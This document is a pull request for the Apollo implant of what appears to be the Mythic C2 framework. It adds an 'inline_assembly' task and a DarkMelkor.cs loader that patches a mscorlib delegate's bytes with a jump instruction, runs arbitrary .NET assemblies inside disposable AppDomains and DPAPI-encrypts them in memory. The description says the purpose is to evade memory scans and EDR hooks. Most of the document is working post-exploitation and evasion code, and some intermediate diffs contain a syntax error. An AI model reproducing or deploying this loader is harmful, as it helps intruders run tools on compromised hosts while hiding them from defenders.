### PR TITLE
Added inline_assembly Task (Run .NET assemblies in disposable AppDomains)

### DIFF
--- a/Payload_Type/apollo/agent_code/Apollo/Apollo.csproj
+++ b/Payload_Type/apollo/agent_code/Apollo/Apollo.csproj
@@ -1,4 +1,4 @@
-﻿<?xml version="1.0" encoding="utf-8"?>
+<?xml version="1.0" encoding="utf-8"?>
 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
   <PropertyGroup>
@@ -161,6 +161,7 @@
     <Compile Include="Utils\ADUtils.cs" />
     <Compile Include="Utils\AuxiliaryClasses.cs" />
     <Compile Include="Utils\ByteUtils.cs" />
+    <Compile Include="Utils\DarkMelkor.cs" />
     <Compile Include="Utils\DebugUtils.cs" />
     <Compile Include="Injection\InjectionTechnique.cs" />
     <Compile Include="IPC\PowerShellJobMessage.cs" />

--- a/Payload_Type/apollo/agent_code/Apollo/CommandModules/AssemblyManager.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/CommandModules/AssemblyManager.cs
@@ -46,7 +46,7 @@ namespace Apollo.CommandModules
         private static Dictionary<string, DPAPI_MODULE> loadedAssemblies = new Dictionary<string, DPAPI_MODULE>();
         private static byte[] loaderStub;
         private static Mutex assemblyMutex = new Mutex();
-        private static object inline_assembly_Locker;
+        private static object inline_assembly_Locker = new object();
         /// <summary>
         /// Execute an arbitrary C# assembly in a sacrificial process
         /// that respects the current caller's token.

--- a/Payload_Type/apollo/agent_code/Apollo/Jobs/JobManager.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/Jobs/JobManager.cs
@@ -19,6 +19,7 @@
 #undef POWERPICK
 #undef PSINJECT
 #undef EXECUTE_ASSEMBLY
+#undef INLINE_ASSEMBLY
 #undef ASSEMBLY_INJECT
 #undef SHINJECT
 #undef LIST_INJECTION_TECHNIQUES
@@ -32,6 +33,7 @@
 #define POWERPICK
 #define PSINJECT
 #define EXECUTE_ASSEMBLY
+#define INLINE_ASSEMBLY
 #define ASSEMBLY_INJECT
 #define SHINJECT
 #define LIST_INJECTION_TECHNIQUES
@@ -75,11 +77,11 @@ namespace Apollo.Jobs
         {
             Job[] tempJobs = null;
             List<JobInformationLite> results = new List<JobInformationLite>();
-            lock(executingJobs)
+            lock (executingJobs)
             {
                 tempJobs = executingJobs.ToArray();
             }
-            
+
             foreach (Job j in tempJobs)
             {
                 if (j.Task.command != "jobs" && j.Task.command != "jobkill")
@@ -99,23 +101,24 @@ namespace Apollo.Jobs
         {
             List<Tasks.ApolloTaskResponse> results = new List<Tasks.ApolloTaskResponse>();
             List<int> popIndexes = new List<int>();
-            lock(executingJobs)
+            lock (executingJobs)
             {
-                foreach(Job j in executingJobs)
+                foreach (Job j in executingJobs)
                 {
-                    foreach(Tasks.ApolloTaskResponse res in j.GetOutput())
+                    foreach (Tasks.ApolloTaskResponse res in j.GetOutput())
                     {
                         results.Add(res);
                     }
                     if (j.Task.completed)
                         popIndexes.Add(executingJobs.IndexOf(j));
                 }
-                foreach(int i in popIndexes)
+                foreach (int i in popIndexes)
                 {
                     if (i < executingJobs.Count)
                     {
                         executingJobs.RemoveAt(i);
-                    } else
+                    }
+                    else
                     {
                         break;
                     }
@@ -169,7 +172,7 @@ namespace Apollo.Jobs
             Thread jobThread = new Thread(() => DispatchJob(j));
             j._JobThread = jobThread;
             jobThread.SetApartmentState(ApartmentState.STA);
-            lock(executingJobs)
+            lock (executingJobs)
             {
                 try
                 {
@@ -207,7 +210,8 @@ namespace Apollo.Jobs
                 {
                     job.SetError(String.Format("Unhandled Exception: {0}\n{1}", ex.Message, ex.StackTrace));
                 }
-            } else
+            }
+            else
             {
                 job.SetError(string.Format("Command \"{0}\" is not loaded.", job.Task.command));
             }

--- a/Payload_Type/apollo/agent_code/Apollo/Jobs/Jobs.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/Jobs/Jobs.cs
@@ -119,7 +119,7 @@ namespace Apollo
                 return _JobThread.IsAlive;
             }
 
-            internal void AddOutput(object output, bool completed=false, string status="")
+            internal void AddOutput(object output, bool completed = false, string status = "")
             {
                 Task.status = status;
                 Task.completed = completed;
@@ -140,7 +140,8 @@ namespace Apollo
                                 new Artifact(){ artifact=msg, base_artifact="Process Create"}
                             }
                         };
-                    } else
+                    }
+                    else
                     {
                         ApolloTaskResponse temp = (ApolloTaskResponse)output;
                         if (temp.artifacts == null)
@@ -194,7 +195,8 @@ namespace Apollo
                     if (unmanagedCommands.Contains(Task.command) && msg.GetType() == typeof(string))
                     {
                         output.Add((string)msg);
-                    } else
+                    }
+                    else
                     {
 #endif
                         if (msg.GetType() != typeof(ApolloTaskResponse))
@@ -232,7 +234,8 @@ namespace Apollo
 #endif
                     SetError("Job aborted via jobkill.");
                     return true;
-                } catch (Exception ex)
+                }
+                catch (Exception ex)
                 {
                     return false;
                 }

--- a/Payload_Type/apollo/agent_code/Apollo/Native/Enums.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/Native/Enums.cs
@@ -54,21 +54,6 @@ namespace Native
         }
 
         [Flags]
-        public enum AllocationType : uint
-        {
-            Commit = 0x1000,
-            Reserve = 0x2000,
-            Decommit = 0x4000,
-            Release = 0x8000,
-            Reset = 0x80000,
-            Physical = 0x400000,
-            TopDown = 0x100000,
-            WriteWatch = 0x200000,
-            ResetUndo = 0x1000000,
-            LargePages = 0x20000000
-        }
-
-        [Flags]
         internal enum LogonFlags : uint
         {
             LOGON_WITH_PROFILE = 0x00000001,
@@ -405,6 +390,7 @@ namespace Native
             Physical = 0x400000,
             TopDown = 0x100000,
             WriteWatch = 0x200000,
+            ResetUndo = 0x1000000,
             LargePages = 0x20000000
         }
 

--- a/Payload_Type/apollo/agent_code/Apollo/Native/Enums.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/Native/Enums.cs
@@ -53,6 +53,20 @@ namespace Native
             INHERIT_PARENT_AFFINITY = 0x00010000
         }
 
+        [Flags]
+        public enum AllocationType : uint
+        {
+            Commit = 0x1000,
+            Reserve = 0x2000,
+            Decommit = 0x4000,
+            Release = 0x8000,
+            Reset = 0x80000,
+            Physical = 0x400000,
+            TopDown = 0x100000,
+            WriteWatch = 0x200000,
+            ResetUndo = 0x1000000,
+            LargePages = 0x20000000
+        }
 
         [Flags]
         internal enum LogonFlags : uint

--- a/Payload_Type/apollo/agent_code/Apollo/Native/Methods.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/Native/Methods.cs
@@ -491,6 +491,8 @@ namespace Native
   DWORD dwThreadId
 );*/
 
+        [DllImport("kernel32")]
+        public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
 
         [DllImport("kernel32.dll", SetLastError = true)]
         public static extern bool DuplicateHandle(
@@ -806,6 +808,11 @@ namespace Native
         #region NTDLL
 
         [DllImport("ntdll.dll")]
+        public static extern void RtlZeroMemory(
+            IntPtr Destination,
+            int length);
+
+        [DllImport("ntdll.dll")]
         internal static extern int NtQueryInformationProcess(
             IntPtr processHandle,
             int processInformationClass,
@@ -1005,5 +1012,30 @@ namespace Native
         public static extern bool DestroyEnvironmentBlock(IntPtr lpEnvironment);
 
         #endregion
+
+        #region CRYPT32
+
+        [DllImport("crypt32.dll", CharSet = CharSet.Auto)]
+        public static extern bool CryptProtectData(
+            ref DATA_BLOB pPlainText,
+            string szDescription,
+            ref DATA_BLOB pEntropy,
+            IntPtr pReserved,
+            IntPtr pPrompt,
+            int dwFlags,
+            ref DATA_BLOB pCipherText);
+
+        [DllImport("crypt32.dll", CharSet = CharSet.Auto)]
+        public static extern bool CryptUnprotectData(
+            ref DATA_BLOB pCipherText,
+            ref string pszDescription,
+            ref DATA_BLOB pEntropy,
+            IntPtr pReserved,
+            IntPtr pPrompt,
+            int dwFlags,
+            ref DATA_BLOB pPlainText);
+
+        #endregion
+
     }
 }

--- a/Payload_Type/apollo/agent_code/Apollo/Native/Structures.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/Native/Structures.cs
@@ -11,7 +11,6 @@ namespace Native
     internal static class Structures
     {
 
-
         [StructLayoutAttribute(LayoutKind.Sequential)]
         public struct SECURITY_DESCRIPTOR
         {
@@ -609,5 +608,31 @@ namespace Native
             public IntPtr hIcon;
             public IntPtr hProcess;
         }
+    }
+
+    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+    internal struct DATA_BLOB
+    {
+        public int cbData;
+        public IntPtr pbData;
+    }
+
+    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+    internal struct CRYPTPROTECT_PROMPTSTRUCT
+    {
+        public int cbSize;
+        public int dwPromptFlags;
+        public IntPtr hwndApp;
+        public string szPrompt;
+    }
+
+    [StructLayout(LayoutKind.Sequential)]
+    internal struct DPAPI_MODULE
+    {
+        public String sModName;
+        public int iModVersion;
+        public int iModSize;
+        public IntPtr pMod;
+        public Byte[] bMod;
     }
 }

--- a/Payload_Type/apollo/agent_code/Apollo/Tasks/Task.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/Tasks/Task.cs
@@ -25,6 +25,8 @@
 #define ASSEMBLY_INJECT
 #undef EXECUTE_ASSEMBLY
 #define EXECUTE_ASSEMBLY
+#undef INLINE_ASSEMBLY
+#define INLINE_ASSEMBLY
 #undef GOLDEN_TICKET
 #define GOLDEN_TICKET
 #undef KEYLOG
@@ -287,6 +289,10 @@ namespace Apollo
                 #if EXECUTE_ASSEMBLY
 
                 { "execute_assembly", "AssemblyManager" },
+                #endif
+                #if INLINE_ASSEMBLY
+
+                { "inline_assembly", "AssemblyManager" },
                 #endif
                 #if LIST_ASSEMBLIES
 

--- a/Payload_Type/apollo/agent_code/Apollo/Utils/DarkMelkor.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/Utils/DarkMelkor.cs
@@ -1,0 +1,246 @@
+using System;
+using System.IO;
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+namespace Apollo.Utils
+{
+    class DarkMelkor
+    {
+        [DllImport("kernel32")]
+        static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
+
+        // API
+        //======================
+        [DllImport("ntdll.dll")]
+        public static extern UInt32 NtFreeVirtualMemory(
+            IntPtr ProcessHandle,
+            ref IntPtr BaseAddress,
+            ref IntPtr RegionSize,
+            AllocationType FreeType);
+
+        [DllImport("ntdll.dll")]
+        public static extern void RtlZeroMemory(
+            IntPtr Destination,
+            int length);
+
+        [DllImport("kernel32.dll")]
+        public static extern IntPtr LocalFree(
+            IntPtr hMem);
+
+        [DllImport("crypt32.dll", CharSet = CharSet.Auto)]
+        public static extern bool CryptProtectData(
+            ref DATA_BLOB pPlainText,
+            string szDescription,
+            ref DATA_BLOB pEntropy,
+            IntPtr pReserved,
+            IntPtr pPrompt,
+            int dwFlags,
+            ref DATA_BLOB pCipherText);
+
+        [DllImport("crypt32.dll", CharSet = CharSet.Auto)]
+        public static extern bool CryptUnprotectData(
+            ref DATA_BLOB pCipherText,
+            ref string pszDescription,
+            ref DATA_BLOB pEntropy,
+            IntPtr pReserved,
+            IntPtr pPrompt,
+            int dwFlags,
+            ref DATA_BLOB pPlainText);
+
+        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+        internal struct DATA_BLOB
+        {
+            public int cbData;
+            public IntPtr pbData;
+        }
+
+        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+        internal struct CRYPTPROTECT_PROMPTSTRUCT
+        {
+            public int cbSize;
+            public int dwPromptFlags;
+            public IntPtr hwndApp;
+            public string szPrompt;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        internal struct DPAPI_MODULE
+        {
+            public String sModName;
+            public int iModVersion;
+            public int iModSize;
+            public IntPtr pMod;
+            public Byte[] bMod;
+        }
+
+        [Flags]
+        public enum AllocationType : uint
+        {
+            Commit = 0x1000,
+            Reserve = 0x2000,
+            Decommit = 0x4000,
+            Release = 0x8000,
+            Reset = 0x80000,
+            Physical = 0x400000,
+            TopDown = 0x100000,
+            WriteWatch = 0x200000,
+            ResetUndo = 0x1000000,
+            LargePages = 0x20000000
+        }
+
+        // Globals
+        //======================
+        public static Byte[] bEntropy = { 0x90, 0x91, 0x92, 0x93 }; // Add entropy to the crypto
+        public static int CRYPTPROTECT_LOCAL_MACHINE = 0x4;
+        public static Object CryptLock = new Object();
+
+        public static string loadAppDomainModule(String[] sParams, Byte[] bMod)
+        {
+            string result = "";
+            var bytes = bMod;
+            AppDomain isolationDomain = AppDomain.CreateDomain(Guid.NewGuid().ToString());
+            isolationDomain.SetData("str", sParams);
+            bool default_domain = AppDomain.CurrentDomain.IsDefaultAppDomain();
+            try
+            {
+                isolationDomain.Load(bMod);
+            }
+            catch { }
+            var Sleeve = new CrossAppDomainDelegate(Console.Beep);
+            var Ace = new CrossAppDomainDelegate(ActivateLoader);
+
+            RuntimeHelpers.PrepareDelegate(Sleeve);
+            RuntimeHelpers.PrepareDelegate(Ace);
+
+            var flags = BindingFlags.Instance | BindingFlags.NonPublic;
+            var codeSleeve = (IntPtr)Sleeve.GetType().GetField("_methodPtrAux", flags).GetValue(Sleeve);
+            var codeAce = (IntPtr)Ace.GetType().GetField("_methodPtrAux", flags).GetValue(Ace);
+
+            int[] patch = new int[3];
+
+            patch[0] = 10;
+            patch[1] = 11;
+            patch[2] = 12;
+
+            uint oldprotect = 0;
+            VirtualProtect(codeSleeve, new UIntPtr((uint)patch[2]), 0x4, out oldprotect);
+            Marshal.WriteByte(codeSleeve, 0x48);
+            Marshal.WriteByte(IntPtr.Add(codeSleeve, 1), 0xb8);
+            Marshal.WriteIntPtr(IntPtr.Add(codeSleeve, 2), codeAce);
+            Marshal.WriteByte(IntPtr.Add(codeSleeve, patch[0]), 0xff);
+            Marshal.WriteByte(IntPtr.Add(codeSleeve, patch[1]), 0xe0);
+            VirtualProtect(codeSleeve, new UIntPtr((uint)patch[2]), oldprotect, out oldprotect);
+            try
+            {
+                isolationDomain.DoCallBack(Sleeve);
+            }
+            catch (Exception ex)
+            {
+            }
+            string str = isolationDomain.GetData("str") as string;
+            result = str;
+            unloadAppDomain(isolationDomain);
+            return result;
+        }
+
+        static void ActivateLoader()
+        {
+            string[] str = AppDomain.CurrentDomain.GetData("str") as string[];
+            string output = "";
+            foreach (var asm in AppDomain.CurrentDomain.GetAssemblies())
+            {
+                if (!asm.FullName.Contains("mscor"))
+                {
+                    TextWriter realStdOut = Console.Out;
+                    TextWriter realStdErr = Console.Error;
+                    TextWriter stdOutWriter = new StringWriter();
+                    TextWriter stdErrWriter = new StringWriter();
+                    Console.SetOut(stdOutWriter);
+                    Console.SetError(stdErrWriter);
+                    var result = asm.EntryPoint.Invoke(null, new object[] { str });
+
+                    Console.Out.Flush();
+                    Console.Error.Flush();
+                    Console.SetOut(realStdOut);
+                    Console.SetError(realStdErr);
+
+                    output = stdOutWriter.ToString();
+                    output += stdErrWriter.ToString();
+                }
+            }
+            AppDomain.CurrentDomain.SetData("str", output);
+
+        }
+
+        public static void unloadAppDomain(AppDomain oDomain)
+        {
+            AppDomain.Unload(oDomain);
+        }
+
+        public static DATA_BLOB makeBlob(Byte[] bData)
+        {
+            DATA_BLOB oBlob = new DATA_BLOB();
+
+            oBlob.pbData = Marshal.AllocHGlobal(bData.Length);
+            oBlob.cbData = bData.Length;
+            RtlZeroMemory(oBlob.pbData, bData.Length);
+            Marshal.Copy(bData, 0, oBlob.pbData, bData.Length);
+
+            return oBlob;
+        }
+
+        public static void freeMod(DPAPI_MODULE oMod)
+        {
+            //IntPtr piLen = (IntPtr)oMod.iModSize;
+            //NtFreeVirtualMemory((IntPtr)(-1), ref oMod.pMod, ref piLen, AllocationType.Release);
+            LocalFree(oMod.pMod);
+        }
+
+        public static DPAPI_MODULE dpapiEncryptModule(Byte[] bMod, String sModName, Int32 iModVersion = 0)
+        {
+            DPAPI_MODULE dpMod = new DPAPI_MODULE();
+
+            DATA_BLOB oPlainText = makeBlob(bMod);
+            DATA_BLOB oCipherText = new DATA_BLOB();
+            DATA_BLOB oEntropy = makeBlob(bEntropy);
+
+            Boolean bStatus = CryptProtectData(ref oPlainText, sModName, ref oEntropy, IntPtr.Zero, IntPtr.Zero, CRYPTPROTECT_LOCAL_MACHINE, ref oCipherText);
+            if (bStatus)
+            {
+                dpMod.sModName = sModName;
+                dpMod.iModVersion = iModVersion;
+                dpMod.iModSize = oCipherText.cbData;
+                dpMod.pMod = oCipherText.pbData;
+            }
+
+            return dpMod;
+        }
+
+        public static DPAPI_MODULE dpapiDecryptModule(DPAPI_MODULE oEncMod)
+        {
+            DPAPI_MODULE oMod = new DPAPI_MODULE();
+
+            Byte[] bEncrypted = new Byte[oEncMod.iModSize];
+            Marshal.Copy(oEncMod.pMod, bEncrypted, 0, oEncMod.iModSize);
+
+            DATA_BLOB oPlainText = new DATA_BLOB();
+            DATA_BLOB oCipherText = makeBlob(bEncrypted);
+            DATA_BLOB oEntropy = makeBlob(bEntropy);
+
+            String sDescription = String.Empty;
+            Boolean bStatus = CryptUnprotectData(ref oCipherText, ref sDescription, ref oEntropy, IntPtr.Zero, IntPtr.Zero, 0, ref oPlainText);
+            if (bStatus)
+            {
+                oMod.pMod = oPlainText.pbData;
+                oMod.bMod = new Byte[oPlainText.cbData];
+                Marshal.Copy(oPlainText.pbData, oMod.bMod, 0, oPlainText.cbData);
+                oMod.iModSize = oPlainText.cbData;
+                oMod.iModVersion = oEncMod.iModVersion;
+            }
+
+            return oMod;
+        }
+    }
+}

--- a/Payload_Type/apollo/mythic/agent_functions/inline_assembly.py
+++ b/Payload_Type/apollo/mythic/agent_functions/inline_assembly.py
@@ -48,7 +48,7 @@ class InlineAssemblyCommand(CommandBase):
                                               delete_after_fetch=True)
         if file_resp.status == MythicStatus.Success:
             task.args.add_arg("loader_stub_id", file_resp.response['agent_file_id'])
-            task.display_params = "Running inline_assembly: {}".format(path.basename(dllPath))
+            task.display_params = "Running inline_assembly")
         else:
             raise Exception("Failed to register execute-assembly DLL: " + file_resp.error)
         return task

--- a/Payload_Type/apollo/mythic/agent_functions/inline_assembly.py
+++ b/Payload_Type/apollo/mythic/agent_functions/inline_assembly.py
@@ -47,8 +47,8 @@ class InlineAssemblyCommand(CommandBase):
                                               file=base64.b64encode(dllBytes).decode(),
                                               delete_after_fetch=True)
         if file_resp.status == MythicStatus.Success:
+            task.display_params = ("Running inline_assembly")
             task.args.add_arg("loader_stub_id", file_resp.response['agent_file_id'])
-            task.display_params = "Running inline_assembly")
         else:
             raise Exception("Failed to register execute-assembly DLL: " + file_resp.error)
         return task

--- a/Payload_Type/apollo/mythic/agent_functions/inline_assembly.py
+++ b/Payload_Type/apollo/mythic/agent_functions/inline_assembly.py
@@ -48,9 +48,9 @@ class InlineAssemblyCommand(CommandBase):
                                               delete_after_fetch=True)
         if file_resp.status == MythicStatus.Success:
             task.args.add_arg("loader_stub_id", file_resp.response['agent_file_id'])
+            task.display_params = "Running inline_assembly: {}".format(path.basename(dllPath))
         else:
             raise Exception("Failed to register execute-assembly DLL: " + file_resp.error)
-
         return task
 
     async def process_response(self, response: AgentResponse):

--- a/Payload_Type/apollo/mythic/agent_functions/inline_assembly.py
+++ b/Payload_Type/apollo/mythic/agent_functions/inline_assembly.py
@@ -47,7 +47,7 @@ class InlineAssemblyCommand(CommandBase):
                                               file=base64.b64encode(dllBytes).decode(),
                                               delete_after_fetch=True)
         if file_resp.status == MythicStatus.Success:
-            task.display_params = ("Running inline_assembly")
+            task.display_params = ("Running inline_assembly: {} {}".format(task.args.get_arg('assembly_name'),task.args.get_arg('assembly_arguments')))
             task.args.add_arg("loader_stub_id", file_resp.response['agent_file_id'])
         else:
             raise Exception("Failed to register execute-assembly DLL: " + file_resp.error)

--- a/Payload_Type/apollo/mythic/agent_functions/inline_assembly.py
+++ b/Payload_Type/apollo/mythic/agent_functions/inline_assembly.py
@@ -1,0 +1,57 @@
+from mythic_payloadtype_container.MythicCommandBase import *
+import json
+from uuid import uuid4
+from sRDI import ShellcodeRDI
+from mythic_payloadtype_container.MythicRPC import *
+from os import path
+import base64
+
+class InlineAssemblyArguments(TaskArguments):
+
+    def __init__(self, command_line):
+        super().__init__(command_line)
+        self.args = {}
+
+    async def parse_arguments(self):
+        if len(self.command_line) == 0:
+            raise Exception("Require an assembly to execute.\n\tUsage: {}".format(InlineAssemblyCommand.help_cmd))
+        parts = self.command_line.split(" ", maxsplit=1)
+        self.add_arg("assembly_name", parts[0])
+        self.add_arg("assembly_arguments", "")
+        if len(parts) == 2:
+            self.add_arg("assembly_arguments", parts[1])
+
+
+class InlineAssemblyCommand(CommandBase):
+    cmd = "inline_assembly"
+    needs_admin = False
+    help_cmd = "inline_assembly [Assembly.exe] [args]"
+    description = "Executes a .NET assembly with the specified arguments in a disposable AppDomain. This assembly must first be known by the agent using the `register_assembly` command."
+    version = 2
+    is_exit = False
+    is_file_browse = False
+    is_process_list = False
+    is_download_file = False
+    is_upload_file = False
+    is_remove_file = False
+    author = "@thiagomayllart"
+    argument_class = InlineAssemblyArguments
+    attackmapping = ["T1547"]
+
+    async def create_tasking(self, task: MythicTask) -> MythicTask:
+        task.args.add_arg("pipe_name", str(uuid4()))
+        dllPath = path.join(self.agent_code_path, "AssemblyLoader_{}.dll".format(task.callback.architecture))
+        dllBytes = open(dllPath, 'rb').read()
+        file_resp = await MythicRPC().execute("create_file",
+                                              task_id=task.id,
+                                              file=base64.b64encode(dllBytes).decode(),
+                                              delete_after_fetch=True)
+        if file_resp.status == MythicStatus.Success:
+            task.args.add_arg("loader_stub_id", file_resp.response['agent_file_id'])
+        else:
+            raise Exception("Failed to register execute-assembly DLL: " + file_resp.error)
+
+        return task
+
+    async def process_response(self, response: AgentResponse):
+        pass


### PR DESCRIPTION
Hi! I've added a new file DarkMelkor.cs in the Utils folder, while also modifying the AssemblyManager.cs file to add the inline_assembly function.

Some months ago, @b33f (FuzzySecurity) developed Melkor: https://github.com/FuzzySecurity/Sharp-Suite/. This tool uses CryptProtectData and CryptUnprotectData functions to encrypt and decrypt .NET assemblies in memory, which is a good way to avoid memory scans flagging registered assemblies in the Apollo agent. Melkor also leverages the capability to run these loaded assemblies in disposable AppDomains, which is a good alternative to fork&run tasks in case process injection (at least through some techniques) is not an option.

The only issue with Melkor is the fact that it is not capable of running these Assemblies in case you are doing this in an injected process. Because of that, some days ago I've modified Melkor into this version: https://github.com/thiagomayllart/DarkMelkor.

This version still encrypts and decrypts the .NET assemblies through the crypt32 functions. However, the way it runs is based in this article: https://www.accenture.com/us-en/blogs/cyber-defense/clrvoyance-loading-managed-code-into-unmanaged-processes.

Bryan Alexander and Josh Stone found a way to "bypass" the way the AppDomains segregate the .NET assemblies. They found that it is possible to create two Cross App Domain Delegates: one of them pointing to a function that can be resolved by our disposable AppDomain (generally a function in the mscorlib) and another one pointing to the malicious function (which, in the context of the Apollo agent, will be the one actually invoking the loaded bytes of our registered assembly). 

By patching the initial bytes of the function (the one that can be resolved) with the jmp instructions (mov rax, &delegate; jmp rax) to the malicious delegate, it is possible to callback this function in a way that, instead of running the non-malicious one, it will end up jumping to the address of the other one, thus, loading the malicious code.

I've also modified the other functions that handle .NET assemblies in AssemblyManager.cs in order to decrypt the registered assemblies. This might help to avoid some memory scans even when using the fork&run tasks.

Some things to mention: 

Since Apollo is compiled for .NET 4.0, I have not added the correct position to patch in case of .NET 4.5 and above. In case that's necessary, i've added these in here: https://github.com/thiagomayllart/DarkMelkor/blob/main/DarkMelkor/DarkMelkor/DarkMelkor/hDarkMelkor.cs (line 126). It seems that in .NET 4.5, the patch position when you are doing this in an injected process is different from when you are doing it by running the compiled Apollo.exe directly. I have not verified these positions in >.NET 4.5.

Currently, the way DarkMelkor modifies the memory regions to RWX is by using the VirtualProtect function. It also leverages RtlZeroMemory by declaring an extern. These problems might be solved by adding ntprotectvirtualmemory and the capability to resolve syscalls dynamically (without dinvoke/without reading ntdll from disk), which solves the problem of having an EDR hooking these functions. I intend to add these in a further request.

Credit goes specially to @b33f (Fuzzy Security), Bryan Alexander and Josh Stone, who actually researched the mentioned techniques, I've just assembled them.